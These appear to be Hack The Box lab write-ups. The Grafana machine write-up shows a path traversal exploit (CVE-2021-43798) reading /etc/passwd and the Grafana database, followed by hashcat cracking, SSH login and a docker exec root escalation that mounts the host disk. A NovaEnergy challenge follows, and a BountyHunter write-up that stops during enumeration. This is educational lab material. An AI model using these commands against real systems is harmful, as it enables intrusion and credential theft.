┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p22,30000 -sC -sV 10.129.234.47 -oA nmap/nmap-port
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for 10.129.234.47
Host is up (0.38s latency).

PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 63:47:0a:81:ad:0f:78:07:46:4b:15:52:4a:4d:1e:39 (RSA)
|   256 7d:a9:ac:fa:01:e8:dd:09:90:40:48:ec:dd:f3:08:be (ECDSA)
|_  256 91:33:2d:1a:81:87:1a:84:d3:b9:0b:23:23:3d:19:4b (ED25519)
30000/tcp closed ndmps
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds

Looking at the port 3000 turns-out it’s the Web application based Grafana, maybe public CVE would do it.

HTTP Service Enumeration

So it’s on:

http://10.129.234.47:3000/

Let’s look at it.

Yep, it’s Grafana based, and it tells us the version:

v8.0.0

Not really a Grafana guy but maybe it have CVE we can use.

Grafana 8.0 CVE Enumeration

Looking at Internet bunch of them says Path traversal:

Let’s use Nulclei for this.

┌──(kali㉿kali)-[~]
└─$ nuclei --target http://10.129.234.47:3000/

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.7.1

                projectdiscovery.io

[INF] Your current nuclei-templates v10.4.0 are outdated. Latest is v10.4.1
. . .[SNIP]. . .
[INF] Templates clustered: 2260 (Reduced 2134 Requests)
[INF] Using Interactsh Server: oast.pro
[CVE-2025-4123:open-redirect] [http] [high] http://10.129.234.47:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..
[cookies-without-secure] [javascript] [info] 10.129.234.47:3000 ["redirect_to"]
[snmpv3-detect] [javascript] [info] 10.129.234.47:3000 ["Enterprise: unknown"]
[CVE-2021-43798] [http] [high] http://10.129.234.47:3000/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
[robots-txt] [http] [info] http://10.129.234.47:3000/robots.txt
[prometheus-metrics] [http] [medium] http://10.129.234.47:3000/metrics
[fingerprinthub-web-fingerprints:grafana] [http] [info] http://10.129.234.47:3000/login
[grafana-metrics-exposure:version] [http] [low] http://10.129.234.47:3000/metrics ["8.0.0"]
[grafana-detect] [http] [info] http://10.129.234.47:3000/login ["8.0.0"]
[missing-cookie-samesite-strict] [http] [info] http://10.129.234.47:3000/ ["redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax"]
[CVE-2021-41174] [http] [medium] http://10.129.234.47:3000/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 ["v8.0.0"]
[http-missing-security-headers:content-security-policy] [http] [info] http://10.129.234.47:3000/login
[http-missing-security-headers:referrer-policy] [http] [info] http://10.129.234.47:3000/login
. . .[SNIP]. . .
[http-missing-security-headers:strict-transport-security] [http] [info] http://10.129.234.47:3000/login
[xss-deprecated-header] [http] [info] http://10.129.234.47:3000/ ["1; mode=block"]

So by nuclei it listed:

CVE-2025-4123
CVE-2021-43798
CVE-2021-41174

And looking at the PoC it’s like confirming the Path traversal. Looking at the “CVE-2021-43798“ it’s says for Grafana:

Seems good! So we don’t actually need credential for it.

Internal Enumeration with CVE-2021-43798

Let’s try it!

┌──(kali㉿kali)-[~]
└─$ curl -i --path-as-is "http://10.129.234.47:3000/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"
HTTP/1.1 200 OK
Accept-Ranges: bytes
. . .[SNIP]. . .
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Date: Tue, 07 Apr 2026 10:47:01 GMT

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:Linux User,,,:/home/grafana:/sbin/nologin

Wow, it works!

Now we can fetch more things like potential:

Grafana Databases
Users SSH RSA

And many more.

┌──(kali㉿kali)-[~]
└─$ sudo curl --path-as-is "http://10.129.234.47:3000/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../var/lib/grafana/grafana.db" -o grafana.db 
  % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                 Dload  Upload  Total   Spent   Left   Speed
100 584.0k 100 584.0k   0      0 136.9k      0   00:04   00:04         115.6k
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ file grafana.db                                                                                                                                                              
grafana.db: SQLite 3.x database, last written using SQLite version 3035004, file counter 366, database pages 146, cookie 0x109, schema 4, UTF-8, version-valid-for 366

Then I found the Grafana database, which when dumped we got the Grafana hashes:

┌──(kali㉿kali)-[~]
└─$ sudo sqlite3 grafana.db .dump                                                                                                                                                   
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE `migration_log` (
`id` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL
, `migration_id` TEXT NOT NULL

. . .[SNIP]. . .

, `theme` TEXT NULL
, `created` DATETIME NOT NULL
, `updated` DATETIME NOT NULL
, `help_flags1` INTEGER NOT NULL DEFAULT 0, `last_seen_at` DATETIME NULL, `is_disabled` INTEGER NOT NULL DEFAULT 0);
INSERT INTO user VALUES(1,0,'admin','admin@localhost','','7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8','YObSoLj55S','hLLY6QQ4Y6','',1,1,0,'','2022-01-23 12:48:04','2022-01-23 12:48:50',0,'2022-01-23 12:48:50',0);
INSERT INTO user VALUES(2,0,'boris','boris@data.vl','boris','dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8','LCBhdtJWjl','mYl941ma8w','',1,0,0,'','2022-01-23 12:49:11','2022-01-23 12:49:11',0,'2012-01-23 12:49:11',0);
CREATE TABLE `temp_user` (
`id` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL
, `org_id` INTEGER NOT NULL
, `version` INTEGER NOT NULL

. . .[SNIP]. . .

Which I found 2 hashes.

7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl

Which from it yes Grafana hash is having a salt, btw from here we also got a domain of:

data.vl

Let’s crack it.

Grafana Hash Password Recovery

For making it crack-able with:

Hashcat
John the Ripper

And more, we need to change the format, I will use this tool called grafana2hashcat.py from GitHub repo.

Singular file!

┌──(kali㉿kali)-[~]
└─$ sudo python3 grafana2hashcat.py sql.hash                 

[+] Grafana2Hashcat
[+] Reading Grafana hashes from:  sql.hash
[+] Done! Read 2 hashes in total.
[+] Converting hashes...
[+] Converting hashes complete.
[*] Outfile was not declared, printing output to stdout instead.

sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=

Nice, now we got our SHA256 which are ready for hashcat.

┌──(kali㉿kali)-[~]
└─$ hashcat -m 10900 crack.hash /usr/share/wordlists/rockyou.txt --show
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1

Which only once cracked! So now we have a pair of:

user: boris
passwd: beautiful1

┌──(kali㉿kali)-[~]
└─$ sudo netexec ssh data.vl -u boris -p beautiful1
SSH         10.129.234.47   22     data.vl          [*] SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7
SSH         10.129.234.47   22     data.vl          [+] boris:beautiful1 (Pwn3d!) Linux - Shell access!

Which grant us Linux Shell!!!

Linux BloodPengu

With credential, let’s BloodPengu first!

┌──(kali㉿kali)-[~]
└─$ sudo bloodpengu-python 10.129.234.47 -u boris -p beautiful1 -d data.vl -o bpe/out.json 

         _  __        ___  __             _____                                
   ___ _| |/_/_______/ _ )/ /__  ___  ___/ / _ \___ ___  ___ ___ __  ___  __ __
  / _ `/>  
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 10.129.234.47:22
  [*]  User    : boris
  [*]  Auth    : password
  [*]  Domain  : data.vl
  [*]  Mode    : full collection
  [*]  Output  : bpe/out.json

  [*]  Connecting to 10.129.234.47:22...
  [+]  Connected in 2.72s  -  boris@10.129.234.47:22
  [+]  Remote  : Linux data 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
  [+]  Users: 31  |  Groups: 55
  [*]  Collecting sudo rules...
  [HIGH    ]  sudo            NOPASSWD rule: (root) NOPASSWD: /snap/bin/docker exec *
  [+]  Sudo rules collected: 1
  [*]  Collecting SUID/SGID binaries...
  [CRITICAL]  suid            GTFOBins SUID binary: /bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /usr/bin/at
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/2253/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/2253/bin/umount
. . .[SNIP]. . .
  [*]  Running SACSPengu analysis...
  [POTENTIAL]  sacspengu       Compiler/interpreter: python3 -> /usr/bin/python3
  [POTENTIAL]  sacspengu       Compiler/interpreter: perl -> /usr/bin/perl

. . .[SNIP]. . .
  [POTENTIAL]  kernel          AppArmor status: apparmor module is loaded.
  [HIGH    ]  kernel          Seccomp disabled for this process (Seccomp: 0)  |  all syscalls available
  [POTENTIAL]  kernel          PAM modules present: /lib/x86_64-linux-gnu/security/pam_nologin.so  |  check CVE-2025-6018/CVE-2025-6019 on openSUSE/SUSE
  [HIGH    ]  kernel          CVE-2025-21756  |  vsock module loaded: vmw_vsock_vmci_transport    32768  1
vsock                  40960  2 vmw_vsock_vmci_transport                                                                                                                                           
vmw_vmci               69632  2 vmw_balloon,vmw_vsock_vmci_transport  |  Attack of the Vsock - VM escape to host root on kernels 6.8/6.11/6.12                                                     
  [HIGH    ]  kernel          core_pattern pipes to handler: |/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -- %E  |  crash a SUID binary to invoke handler as root
  [+]  Kernel: 5.4.0-1103-aws  |  CVE matches: 6  |  Total LPE findings: 16

  ----------------------------------------------------------------------

  [+]  Collection complete in 933.12s

  [CRITICAL ]  46
  [HIGH     ]  24
  [POTENTIAL]  9

  [~]  Total findings  :  79
  [~]  Graph nodes     :  353
  [~]  Graph edges     :  150
  [~]  Output file     :  bpe/out.json

  [+]  Import bpe/out.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.5.8 by <@byt3n33dl3>

From the Graph collector we know that we have Docker Containers inside, so now my BloodPengu-Python would specify module for it!

┌──(kali㉿kali)-[~]
└─$ sudo bloodpengu-python 10.129.234.47 -u boris -p beautiful1 -d data.vl -M brace -o bpe/out-brace.json 

         _  __        ___  __             _____                                
   ___ _| |/_/_______/ _ )/ /__  ___  ___/ / _ \___ ___  ___ ___ __  ___  __ __
  / _ `/>  
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 10.129.234.47:22
  [*]  User    : boris
  [*]  Auth    : password
  [*]  Domain  : data.vl
  [*]  Mode    : brace
  [*]  Output  : bpe/out-brace.json

  [*]  Connecting to 10.129.234.47:22...
  [+]  Connected in 2.72s  -  boris@10.129.234.47:22
  [+]  Remote  : Linux data 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
  [+]  Users: 31  |  Groups: 55
  [*]  Collecting privileged group memberships...
  [+]  Groups: boris
  [+]  Container runtimes: none  |  Escape paths: 0  |  Inside container: no

  ----------------------------------------------------------------------

  [+]  Collection complete in 47.75s

  [CRITICAL ]  0
  [HIGH     ]  0
  [POTENTIAL]  0

  [~]  Total findings  :  0
  [~]  Graph nodes     :  87
  [~]  Graph edges     :  1
  [~]  Output file     :  bpe/out-brace.json

  [+]  Import bpe/out-brace.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.5.8 by <@byt3n33dl3>

Let’s see the Graphs:

So we got one no-password access:

It’s a Docker Exec.

internal Enumeration and Escalation Effort

Let’s see from inside:

boris@data:~$ id
uid=1001(boris) gid=1001(boris) groups=1001(boris)

Let’s abuse the no-passwd:

boris@data:~$ sudo /snap/bin/docker exec -h
Flag shorthand -h has been deprecated, please use --help

Usage:  docker exec [OPTIONS] CONTAINER COMMAND [ARG...]

Run a command in a running container

Options:
  -d, --detach               Detached mode: run command in the background
      --detach-keys string   Override the key sequence for detaching a container
  -e, --env list             Set environment variables
      --env-file list        Read in a file of environment variables
  -i, --interactive          Keep STDIN open even if not attached
      --privileged           Give extended privileges to the command
  -t, --tty                  Allocate a pseudo-TTY
  -u, --user string          Username or UID (format: [:])
  -w, --workdir string       Working directory inside the container
boris@data:~$ sudo /snap/bin/docker exec -it -u 0 grafana /bin/bash
bash-5.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
bash-5.1# whoami
root

Wow! we’re root already, however this is Docker root.

After bit of Enumeration and trying around:

bash-5.1# cd /var
. . .[SNIP]. . .
drwxr-xr-x    1 root     root          4096 Jan 23  2022 ..
bash-5.1# ps aux
PID   USER     TIME  COMMAND
    1 grafana   0:09 grafana-server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packaging=docker cfg:default.log.mode=console cfg:default.paths.data=/var/lib/grafana cfg:de
   27 root      0:00 /bin/bash
   44 root      0:00 ps aux
bash-5.1# ss -tunlp
bash: ss: command not found
bash-5.1# cd /
. . .[SNIP]. . .
bash-5.1# cd dev
bash-5.1# ls
agpgart          kmsg             net              sg0              tty15            tty28            tty40            tty53            tty9             vcs5             vcsu5
autofs           loop-control     null             shm              tty16            tty29            tty41            tty54            ttyS0            vcs6             vcsu6
bsg              loop0            nvram            snapshot         tty17            tty3             tty42            tty55            ttyS1            vcsa             vfio
btrfs-control    loop1            port             stderr           tty18            tty30            tty43            tty56            ttyS2            vcsa1            vga_arbiter
core             loop2            ppp              stdin            tty19            tty31            tty44            tty57            ttyS3            vcsa2            vhost-net
cpu_dma_latency  loop3            psaux            stdout           tty2             tty32            tty45            tty58            ttyprintk        vcsa3            vhost-vsock
cuse             loop4            ptmx             tty              tty20            tty33            tty46            tty59            udmabuf          vcsa4            vmci
ecryptfs         loop5            pts              tty0             tty21            tty34            tty47            tty6             uinput           vcsa5            vsock
fd               loop6            random           tty1             tty22            tty35            tty48            tty60            urandom          vcsa6            zero
full             loop7            rfkill           tty10            tty23            tty36            tty49            tty61            vcs              vcsu             zfs
fuse             mapper           rtc0             tty11            tty24            tty37            tty5             tty62            vcs1             vcsu1
hpet             mcelog           sda              tty12            tty25            tty38            tty50            tty63            vcs2             vcsu2
hwrng            mem              sda1             tty13            tty26            tty39            tty51            tty7             vcs3             vcsu3
input            mqueue           sda2             tty14            tty27            tty4             tty52            tty8             vcs4             vcsu4

I decide to create a mount, request a root access file to me:

bash-5.1# mount sda1 /mnt
bash-5.1# ls mnt
ls: mnt: No such file or directory
bash-5.1# cd ..
bash-5.1# ls mnt
bin             etc             initrd.img.old  lost+found      opt             run             srv             usr             vmlinuz.old
boot            home            lib             media           proc            sbin            sys             var
dev             initrd.img      lib64           mnt             root            snap            tmp             vmlinuz
bash-5.1# ls -al /mnt/
total 112
drwxr-xr-x   23 root     root          4096 Jun  4  2025 .
drwxr-xr-x    1 root     root          4096 Jan 23  2022 ..
. . .[SNIP]. . .
drwxr-xr-x    2 root     root          4096 Nov 29  2021 srv
drwxr-xr-x    2 root     root          4096 Apr 24  2018 sys
drwxrwxrwt   11 root     root          4096 Apr  7 11:08 tmp
drwxr-xr-x   10 root     root          4096 Apr  9  2025 usr
drwxr-xr-x   13 root     root          4096 Nov 29  2021 var
lrwxrwxrwx    1 root     root            27 Apr  9  2025 vmlinuz -> boot/vmlinuz-5.4.0-1103-aws
lrwxrwxrwx    1 root     root            27 Jun  4  2025 vmlinuz.old -> boot/vmlinuz-5.4.0-1103-aws
bash-5.1# cat /mnt/root/root.txt 
386e38ac17bbfc1f893c1337bd9bcc99
bash-5.1#

That’s it!

labs.hackthebox.com/achievement/machine/2489228/673

Happy Hacking!

HTB NovaEnergy - Web

Sulaiman — Thu, 02 Apr 2026 08:42:16 GMT

NovaEnergy (API Attack)

NovaEnergy is a internal web application used for file sharing system. This site can only be accessed by employee of NovaEnergy company.

You're tasked to hunt for any vulnerabilities that led to any breaches in their site.

Target:

154.57.164.74:30838

UI:

Let’s Feroxbuster first:

┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://154.57.164.74:30838 --filter-status 404
                                                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://154.57.164.74:30838/
 🚩  In-Scope Url          │ 154.57.164.74
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 💢  Status Code Filters   │ [404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        5l       31w      207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       83l      179w     3224c http://154.57.164.74:30838/register
200      GET       81l      161w     2915c http://154.57.164.74:30838/login
301      GET        7l       11w      169c http://154.57.164.74:30838/api => http://154.57.164.74/api/
200      GET      272l      801w     9474c http://154.57.164.74:30838/static/auth.js
200      GET      145l      395w     4513c http://154.57.164.74:30838/static/utils.js
200      GET      122l      313w     3435c http://154.57.164.74:30838/static/api.js
302      GET        5l       22w      199c http://154.57.164.74:30838/upload => http://154.57.164.74:30838/login
200      GET      108l      304w     3882c http://154.57.164.74:30838/static/logout.js
200      GET       44l       77w     1313c http://154.57.164.74:30838/logout
200      GET      879l     2306w    29621c http://154.57.164.74:30838/static/script.js
200      GET     1174l     2123w    22559c http://154.57.164.74:30838/static/styles.css
200      GET      154l      452w     7083c http://154.57.164.74:30838/
301      GET        7l       11w      169c http://154.57.164.74:30838/static => http://154.57.164.74/static/
302      GET        5l       22w      199c http://154.57.164.74:30838/dashboard => http://154.57.164.74:30838/login
[##>-----------------] - 12s     3112/30009   2m      found:14      errors:1      
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_154_57_164_74_30838_-1775118734.state ...
[##>-----------------] - 12s     3113/30009   2m      found:14      errors:1      
[##>-----------------] - 12s     3095/30000   248/s   http://154.57.164.74:30838/                                                                                                                                                                                                                                                                                                                     

┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://154.57.164.74:30838/api/ --filter-status 404
                                                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://154.57.164.74:30838/api
 🚩  In-Scope Url          │ 154.57.164.74
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 💢  Status Code Filters   │ [404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        1l        2w       22c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        7l       11w      169c http://154.57.164.74:30838/api => http://154.57.164.74/api/
405      GET        1l        3w       31c http://154.57.164.74:30838/api/register
405      GET        1l        3w       31c http://154.57.164.74:30838/api/login
401      GET        1l        2w       30c http://154.57.164.74:30838/api/files
200      GET       31l       64w      962c http://154.57.164.74:30838/api/docs

So there’s nothing much:

Register First
Activate our email address via leaked API interface

Let’s make access:

user: ayam@gonuclear.com
passwd: ayam

And yep, we needed to activate it!

So in the API:

We:

First confirm our email used for registration
Get an activated Key
And parse the Key on “email-verify“

And we got our key:

{
  "email": "ayam@gonuclear.com",
  "token": "150d6772-f8fa-45f6-8b78-ebb9d4ed7609"
}

Done, success!

And we logged on!

Happy Hacking!

HTB - BountyHunter Linux (Easy)

Sulaiman — Thu, 02 Apr 2026 08:13:59 GMT

From HTB:

BountyHunter is an easy Linux machine that uses XML external entity injection to read system files. Being able to read a PHP file where credentials are leaked gives the opportunity to get a foothold on system as development user.

A message from John mentions a contract with Skytrain Inc and states about a script that validates tickets.

Auditing the source code of the python script reveals that it uses the eval function on ticket code, which can be injected, and as the python script can be run as root with sudo by the development user it is possible to get a root shell.

Network Enumeration and Port Discovery

┌──(kali㉿kali)-[~]
└─$ ping -c2 10.129.95.166
PING 10.129.95.166 (10.129.95.166) 56(84) bytes of data.
64 bytes from 10.129.95.166: icmp_seq=1 ttl=63 time=259 ms
64 bytes from 10.129.95.166: icmp_seq=2 ttl=63 time=268 ms

--- 10.129.95.166 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 258.635/263.112/267.589/4.477 ms

Continue with NMAP Scanning:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.129.95.166 -oA nmap/nmap
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for 10.129.95.166
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p22,80 -sC -sV 10.129.95.166 -oA nmap/nmap-ports
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for 10.129.95.166
Host is up (0.25s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Bounty Hunters
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds

Welp, nothing else than to start with HTTP on port 80.

HTTP Service Enumeration

This is the UI:

Nothing much, but when we go to Portal

We’re going to be directed to this simple bounty hunter counting measure template.

For much simpler, i just test with a bunch of “test“.

And since for Discovery and enumeration, I run Ferox:

┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://10.129.95.166/ --filter-status 404 
                                                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.95.166/
 🚩  In-Scope Url          │ 10.129.95.166
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 💢  Status Code Filters   │ [404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      311c http://10.129.95.166/js => http://10.129.95.166/js/
200      GET       69l      210w     2424c http://10.129.95.166/js/scripts.js
200      GET      248l      761w    12807c http://10.129.95.166/assets/img/avataaars.svg
200      GET      139l      444w    35267c http://10.129.95.166/assets/img/portfolio/safe.png
200      GET    10240l    19373w   187375c http://10.129.95.166/css/styles.css
301      GET        9l       28w      315c http://10.129.95.166/assets => http://10.129.95.166/assets/
301      GET        9l       28w      312c http://10.129.95.166/css => http://10.129.95.166/css/
301      GET        9l       28w      318c http://10.129.95.166/resources => http://10.129.95.166/resources/
200      GET        6l       34w      210c http://10.129.95.166/resources/README.txt
200      GET        1l       44w     2532c http://10.129.95.166/resources/jquery.easing.min.js
200      GET       64l      232w     2682c http://10.129.95.166/resources/lato.css
200      GET       24l       44w      594c http://10.129.95.166/resources/bountylog.js
200      GET       80l      248w     3228c http://10.129.95.166/resources/monsterat.css
200      GET        5l       15w      125c http://10.129.95.166/portal.php
200      GET      122l      415w    30702c http://10.129.95.166/assets/img/portfolio/cake.png
200      GET        8l       29w    28898c http://10.129.95.166/assets/img/favicon.ico
200      GET      178l      601w    46744c http://10.129.95.166/assets/img/portfolio/game.png
200      GET      150l      506w    43607c http://10.129.95.166/assets/img/portfolio/submarine.png
200      GET      151l      616w    50204c http://10.129.95.166/assets/img/portfolio/circus.png
200      GET        7l      567w    48945c http://10.129.95.166/resources/bootstrap_login.min.js
200      GET      195l      683w    66699c http://10.129.95.166/assets/img/portfolio/cabin.png
200      GET        7l     1031w    84152c http://10.129.95.166/resources/bootstrap.bundle.min.js
200      GET        4l     1298w    86659c http://10.129.95.166/resources/jquery_login.min.js
200      GET        2l     1297w    89476c http://10.129.95.166/resources/jquery.min.js
301      GET        9l       28w      319c http://10.129.95.166/assets/img => http://10.129.95.166/assets/img/
200      GET        5l   108280w  1194961c http://10.129.95.166/resources/all.js
200      GET      388l     1470w    25169c http://10.129.95.166/
301      GET        9l       28w      329c http://10.129.95.166/assets/img/portfolio => http://10.129.95.166/assets/img/portfolio/
[##>-----------------] - 50s    19349/180057  6m      found:28      errors:639    
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_129_95_166_-1775111868.state ...
[##>-----------------] - 50s    19354/180057  6m      found:28      errors:639    
[##>-----------------] - 50s     4429/30000   88/s    http://10.129.95.166/ 
[##>-----------------] - 47s     3456/30000   73/s    http://10.129.95.166/js/ 
[##>-----------------] - 46s     3757/30000   82/s    http://10.129.95.166/assets/ 
[##>-----------------] - 44s     3414/30000   77/s    http://10.129.95.166/css/ 
[####################] - 3s     30000/30000   10571/s http://10.129.95.166/resources/ => Directory listing (add --scan-dir-listings to scan)
[#>------------------] - 41s     2773/30000   67/s    http://10.129.95.166/assets/img/ 
[>-------------------] - 29s     1431/30000   49/s    http://10.129.95.166/assets/img/portfolio/ 
